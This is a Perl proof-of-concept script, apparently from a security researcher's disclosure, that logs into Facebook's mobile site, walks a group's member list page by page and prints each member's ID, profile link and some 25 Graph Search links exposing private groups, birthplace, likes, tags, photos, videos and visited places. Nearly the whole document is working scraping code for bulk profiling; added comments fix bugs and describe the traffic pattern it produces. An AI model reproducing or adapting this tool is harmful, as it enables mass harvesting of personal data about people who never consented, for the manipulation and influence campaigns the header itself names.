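#!/usr/bin/perl
#
#  Facebook (facebug) 'Graph' Groups crosswalk user's
#  metadata mapping weakness (Demo PoC)
#
#
#  2018 Todor Donev <todor.donev at gmail.com>
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg
#
#  Description:
#  Criminal hacker (CRACKER) can take advantage of
#  this weakness by creating a specialized database
#  to manipulate the humans (facebook users) with
#  fake news, misinformation, propaganda or influence
#  elections.
#
#  See Also:
#  https://en.wikipedia.org/wiki/Schema_crosswalk
#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use them at your own risk!
#
#  Requirements:
#  cpan install HTTP::Cookies
#  cpan install WWW::Mechanize
#
#
#  I know that is buggy but is only conceptual tool
#  which demonstrate exploitation of this weakness.
#
#
#  Facebook answer:
#  Hi Todor,
#
#  Thank you for contacting us. Unfortunately what
#  you have described is not currently covered by
#  this program. Please see
#  https://www.facebook.com/data-abuse/terms/ for
#  more information about what is currently in scope
#  of this program. We will follow up with you
#  regarding any questions we may have. For any other
#  questions or concerns, please visit our Help Center:
#  https://www.facebook.com/help.
#
#  Thanks,
#
#  Amber Serrano
#  Developer Operations
#
#  Data Abuse Bounty is useless when this door is widely
#  opened for criminal abusing.
#
#  Now this weakness is patched..
#
#  Buggy, Buggy, Buggy.. :)
#
#  What the script does, as written:
#    1. logs in through the mobile login form with the account below;
#    2. pages through one group's member list 30 entries at a time;
#    3. for every member found, prints the numeric user id, the profile
#       link, and a fixed set of per-user search links built from that id.
#  The weakness being demonstrated is step 3: a numeric id taken from a
#  group listing was enough to key many other per-user lookups. Seen from
#  the service side, step 2 is a single authenticated session requesting
#  start=0,30,60,... back to back, which is the shape that pagination caps
#  and per-session rate limits are meant to catch.
#
use strict;
use warnings;
use WWW::Mechanize;
use HTTP::Cookies;
use open ':std', ':encoding(UTF-8)';

# Account used for the session. The author ships both values empty; a copy
# with real values filled in holds a plaintext password and should not be
# committed or shared.
my $un = ''; # facebook login
my $pw = ''; # facebook password

print "Facebook (facebug) \'Graph\' Groups crosswalk metadata mapping weakness (Demo PoC)\n";
print "[ Website: https://ethical-hacker.org\n";
print "[ Author: Todor Donev <todor.donev at gmail.com>\n";
die "Usage: perl $0 <Group ID>\n" unless (scalar @ARGV)==1;

# Member-list paging: the listing is requested in steps of 30 up to this bound.
my $page_step  = 30;
my $max_offset = 100000;

# Fixed pieces of every output line: a green "[" prefix, yellow for the link,
# and the attribute reset. Bytes are the same escape sequences the original
# spelled out inline.
my $tag    = "\x1b\x5b0;32m[\x1b\x5b0m";
my $url_on = "\x1b\x5b0;33m";
my $off    = "\x1b\x5b0m";

# Label / search-path pairs printed for every member, in output order.
# Labels are reproduced exactly as the author wrote them.
my @search_views = (
    [ q{Which facebook groups the person joined},         'groups' ],
    [ q{Which private facebook groups the person joined}, 'groups-privacy' ],
    [ q{Where the person is bornd},                       'users-birth-place' ],
    [ q{Posts that the person commented on},              'stories-commented' ],
    [ q{Posts that the person like},                      'stories-liked' ],
    [ q{In which posts is this person tagged},            'stories-tagged' ],
    [ q{Posts by the person},                             'stories-by' ],
    [ q{Photos maded by the person},                      'photos-by' ],
    [ q{Posts that the person like},                      'photos-in' ],
    [ q{Which photos does this person like},              'photos-liked' ],
    [ q{Photos made of this person},                      'photos-of' ],
    [ q{In which photos is this person tagged},           'photos-tagged' ],
    [ q{What photos did the person comment on},           'photos-commented' ],
    [ q{What photos did the friends upload},              'friends/photos-uploaded' ],
    [ q{What photos did the friends tagged},              'friends/photos-tagged' ],
    [ q{What photos maded by the person's friends},       'friends/photos-of' ],
    [ q{Photos by the person's friends},                  'friends/photos-by' ],
    [ q{Videos made of this person},                      'videos-of' ],
    [ q{Videos maded by the person},                      'videos-by' ],
    [ q{In which videos is this person},                  'videos-in' ],
    [ q{Which videos does this person like},              'videos-liked' ],
    [ q{In which videos is this person tagged},           'videos-tagged' ],
    [ q{What videos did the person comment on},           'videos-commented' ],
    [ q{What videos did the friends upload},              'friends/videos-uploaded' ],
    [ q{All visited places},                              'places-visited' ],
);

my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->agent_alias('Linux Mozilla');

# The login form is fetched over HTTPS. The original requested it over plain
# http://, so the page that carries the form (and decides where the password
# is posted) could be altered in transit before the credentials were sent.
$mech->get("https://m.facebook.com/login.php");
$mech->submit_form(form_number => 1, fields => { email => $un, pass => $pw });

# Stop when the page after login lacks the expected form token. The original
# wrote `!$mech->content() =~ /.../`; `!` binds tighter than `=~`, so the
# negation was applied to the content string and the guard could not fire.
# NOTE(review): post_form_id as the logged-in marker is the author's choice;
# confirm it against a real response. $! is errno and is not set by a failed
# login; the message text is kept as the author wrote it.
die "Error: $! \n" unless $mech->content() =~ /post_form_id\"\svalue=\"(\w+)\"/;

foreach my $gid (@ARGV) {
    $mech->get("https://m.facebook.com/browse/group/members/?id=$gid");
    my $landing = $mech->content();

    # print, not printf: the page title is remote text and must not be
    # interpreted as a format string.
    print "$1 " if $landing =~ m/<title>(.*)<\/title>/;

    for (my $offset = 0; $offset <= $max_offset; $offset += $page_step) {
        $mech->get("https://m.facebook.com/browse/group/members/?id=$gid&start=$offset&listType=list_general");
        my $page = $mech->content();

        # Either marker ends the run; this die is the script's normal exit
        # once the listing is exhausted.
        die "[ No results found\n[\n[ ==========================\n"
            if ( $page =~ m{Content Not Found} or $page =~ m{No results found.} );

        # @profiles is a flat list of (profile path, display name) pairs;
        # @userid holds the ids taken from the member_<id> attributes.
        my @profiles = $page =~ m/<div><h3><a href="\/(.*?)">(.*?)<\/a><\/h3>/g;
        my @userid   = $page =~ m/id="member_(.*?)">/g;
        next unless @profiles && @userid;

        while (@profiles || @userid) {
            # The two lists come from independent patterns and can differ in
            # length; a missing field prints as empty instead of undef.
            my $fburl = shift(@profiles) // '';
            my $name  = shift(@profiles) // '';
            my $pid   = shift(@userid)   // '';

            # Every value below is scraped text, so all lines go through
            # print: a '%' in a name or path is data, not a format directive.
            print "\x1b\x5b0;32m[\x1b\x5b0m User ID: \x1b\x5b0;35m $pid \x1b\x5b0m Name/Profile: \x1b\x5b1;36m $name \x1b\x5b0m \x1b\x5b1;31m=>\x1b\x5b0m https://www.facebook.com/\x1b\x5b0;36m$fburl \x1b\x5b0m\n";

            for my $view (@search_views) {
                my ($label, $path) = @{$view};
                print "$tag ${label}:$url_on https://www.facebook.com/search/$pid/$path $off\n";
            }

            print "$tag Which people are following:$url_on https://m.facebook.com/subscribe/lists/?id=$pid $off\n";
            print "$tag \n";
        }
    }
}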